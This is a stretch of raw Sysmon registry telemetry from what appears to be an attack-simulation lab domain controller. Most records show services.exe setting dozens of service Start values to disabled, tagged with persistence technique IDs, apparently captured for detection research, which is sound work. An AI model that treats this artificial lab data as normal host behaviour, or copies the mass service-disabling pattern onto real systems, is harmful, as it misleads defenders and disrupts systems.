10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WinRM\StartDWORD (0x00000004) 13241300x8000000000000000290946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WinNat\StartDWORD (0x00000004) 13241300x8000000000000000290945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Winmgmt\StartDWORD (0x00000004) 13241300x8000000000000000290944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WinMad\StartDWORD (0x00000004) 13241300x8000000000000000290943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WinHttpAutoProxySvc\StartDWORD (0x00000004) 13241300x8000000000000000290942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WindowsTrustedRTProxy\ImagePath\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys 13241300x8000000000000000290941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WindowsTrustedRTProxy\StartDWORD (0x00000004) 13241300x8000000000000000290940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WindowsTrustedRT\ImagePath\SystemRoot\system32\drivers\WindowsTrustedRT.sys 13241300x8000000000000000290939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WindowsTrustedRT\StartDWORD (0x00000004) 13241300x8000000000000000290938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WIMMount\StartDWORD (0x00000004) 13241300x8000000000000000290937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WiaRpc\StartDWORD (0x00000004) 13241300x8000000000000000290936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WFPLWFS\ImagePath\SystemRoot\System32\drivers\wfplwfs.sys 13241300x8000000000000000290935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WFPLWFS\StartDWORD (0x00000004) 23542300x8000000000000000290934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=891D2279733DB62185887B82EBBD43BE,SHA256=28EEEB373D17C329AD140D321AECA39B5DC9B3A4054F2F059BBFD5C4F5B905FB,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WerSvc\StartDWORD (0x00000004) 13241300x8000000000000000290932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wercplsupport\StartDWORD (0x00000004) 13241300x8000000000000000290931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WEPHOSTSVC\StartDWORD (0x00000004) 13241300x8000000000000000290930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Wecsvc\StartDWORD (0x00000004) 13241300x8000000000000000290929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Wdf01000\ImagePath\SystemRoot\system32\drivers\Wdf01000.sys 13241300x8000000000000000290928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Wdf01000\StartDWORD (0x00000004) 13241300x8000000000000000290927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wcnfs\StartDWORD (0x00000004) 13241300x8000000000000000290926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Wcmsvc\StartDWORD (0x00000004) 13241300x8000000000000000290925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wcifs\StartDWORD (0x00000004) 13241300x8000000000000000290924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WbioSrvc\StartDWORD (0x00000004) 13241300x8000000000000000290923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wanarpv6\StartDWORD (0x00000004) 13241300x8000000000000000290922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wanarp\StartDWORD (0x00000004) 13241300x8000000000000000290921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.182{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WalletService\StartDWORD (0x00000004) 13241300x8000000000000000290920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WacomPen\StartDWORD (0x00000004) 13241300x8000000000000000290919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\W32Time\StartDWORD (0x00000004) 13241300x8000000000000000290918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vxn\StartDWORD (0x00000004) 13241300x8000000000000000290917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vwifibus\StartDWORD (0x00000004) 13241300x8000000000000000290916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\VSTXRAID\ImagePath\SystemRoot\System32\drivers\vstxraid.sys 12241200x8000000000000000290915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\VSTXRAID\StartOverride 13241300x8000000000000000290914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\VSTXRAID\StartDWORD (0x00000004) 13241300x8000000000000000290913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\VSS\StartDWORD (0x00000004) 13241300x8000000000000000290912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vsmraid\ImagePath\SystemRoot\System32\drivers\vsmraid.sys 12241200x8000000000000000290911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vsmraid\StartOverride 13241300x8000000000000000290910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vsmraid\StartDWORD (0x00000004) 13241300x8000000000000000290909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vpci\StartDWORD (0x00000004) 13241300x8000000000000000290908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volume\ImagePath\SystemRoot\System32\drivers\volume.sys 13241300x8000000000000000290907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volume\StartDWORD (0x00000004) 13241300x8000000000000000290906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volsnap\ImagePath\SystemRoot\System32\drivers\volsnap.sys 13241300x8000000000000000290905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volsnap\StartDWORD (0x00000004) 13241300x8000000000000000290904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volmgrx\ImagePath\SystemRoot\System32\drivers\volmgrx.sys 13241300x8000000000000000290903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volmgrx\StartDWORD (0x00000004) 13241300x8000000000000000290902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volmgr\ImagePath\SystemRoot\System32\drivers\volmgr.sys 13241300x8000000000000000290901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\volmgr\StartDWORD (0x00000004) 13241300x8000000000000000290900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmicvss\StartDWORD (0x00000004) 13241300x8000000000000000290899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmicvmsession\StartDWORD (0x00000004) 13241300x8000000000000000290898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmictimesync\StartDWORD (0x00000004) 13241300x8000000000000000290897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmicshutdown\StartDWORD (0x00000004) 13241300x8000000000000000290896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.166{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmicrdv\StartDWORD (0x00000004) 13241300x8000000000000000290895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.165{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmickvpexchange\StartDWORD (0x00000004) 13241300x8000000000000000290894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.164{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmicheartbeat\StartDWORD (0x00000004) 13241300x8000000000000000290893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.163{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmicguestinterface\StartDWORD (0x00000004) 13241300x8000000000000000290892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.162{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmgid\StartDWORD (0x00000004) 13241300x8000000000000000290891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.162{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\VMBusHID\StartDWORD (0x00000004) 13241300x8000000000000000290890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.161{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmbus\ImagePath\SystemRoot\System32\drivers\vmbus.sys 12241200x8000000000000000290889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.161{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmbus\StartOverride 13241300x8000000000000000290888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.160{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vmbus\StartDWORD (0x00000004) 13241300x8000000000000000290887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vhf\StartDWORD (0x00000004) 13241300x8000000000000000290886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vhdmp\StartDWORD (0x00000004) 13241300x8000000000000000290885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\VerifierExt\StartDWORD (0x00000004) 13241300x8000000000000000290884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vds\StartDWORD (0x00000004) 13241300x8000000000000000290883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vdrvroot\ImagePath\SystemRoot\System32\drivers\vdrvroot.sys 13241300x8000000000000000290882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\vdrvroot\StartDWORD (0x00000004) 13241300x8000000000000000290881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\VaultSvc\StartDWORD (0x00000004) 13241300x8000000000000000290880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserManager\StartDWORD (0x00000004) 13241300x8000000000000000290879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\USBXHCI\StartDWORD (0x00000004) 13241300x8000000000000000290878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\usbuhci\StartDWORD (0x00000004) 13241300x8000000000000000290877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\USBSTOR\StartDWORD (0x00000004) 13241300x8000000000000000290876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\usbser\StartDWORD (0x00000004) 13241300x8000000000000000290875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\usbprint\StartDWORD (0x00000004) 13241300x8000000000000000290874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\usbohci\StartDWORD (0x00000004) 13241300x8000000000000000290873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\USBHUB3\StartDWORD (0x00000004) 13241300x8000000000000000290872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\usbhub\StartDWORD (0x00000004) 13241300x8000000000000000290871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.144{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\usbehci\StartDWORD (0x00000004) 13241300x8000000000000000290870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\usbccgp\StartDWORD (0x00000004) 13241300x8000000000000000290869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UrsSynopsys\StartDWORD (0x00000004) 13241300x8000000000000000290868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UrsCx01000\StartDWORD (0x00000004) 13241300x8000000000000000290867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UrsChipidea\StartDWORD (0x00000004) 13241300x8000000000000000290866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\upnphost\StartDWORD (0x00000004) 13241300x8000000000000000290865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UmRdpService\StartDWORD (0x00000004) 13241300x8000000000000000290864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UmPass\StartDWORD (0x00000004) 13241300x8000000000000000290863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\umbus\StartDWORD (0x00000004) 13241300x8000000000000000290862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UI0Detect\StartDWORD (0x00000004) 13241300x8000000000000000290861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ufxsynopsys\StartDWORD (0x00000004) 13241300x8000000000000000290860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UfxChipidea\StartDWORD (0x00000004) 13241300x8000000000000000290859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Ufx01000\StartDWORD (0x00000004) 13241300x8000000000000000290858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UevAgentService\StartDWORD (0x00000004) 13241300x8000000000000000290857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UevAgentDriver\StartDWORD (0x00000004) 